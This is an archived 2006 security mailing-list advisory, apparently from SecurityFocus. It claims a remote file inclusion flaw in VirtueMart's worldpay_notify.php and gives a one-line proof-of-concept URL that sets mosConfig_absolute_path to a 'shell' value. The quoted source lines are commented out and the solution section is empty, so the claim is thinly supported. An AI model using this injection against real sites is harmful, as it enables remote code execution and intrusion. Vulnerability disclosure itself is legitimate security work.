Vuln Dev
VirtueMart Sep 09 2006 12:41AM
t3rr0r1st aria-security net
#Aria-Security.net Advisory

#Discovered by: Dr.T3rr0r1st

#< www.Aria-security.net >

#Gr33t to: The-0utl4w & A.u.r.a & R@1D3N & Smok3r

#-----------------------------------------------------------

Software: VirtueMart

Link: virtumart.net

Attack method: Remote File Inclusion

Source :

//Set up the mailer to infor Warehouse of validated order

//require_once( $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php');

//$mail = new mosPHPMailer();

//$mail->PluginDir = $mosConfig_absolute_path . '/includes/phpmailer/';

//$mail->SetLanguage("en", $mosConfig_absolute_path . '/includes/phpmailer/language/');

Proof of Concept:

http://site.com/%5bpath%5d/worldpay_notify.php?mosConfig_absolute_path=s
hell

Solution

contact me: Advisory (at) Aria-Security (dot) net [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus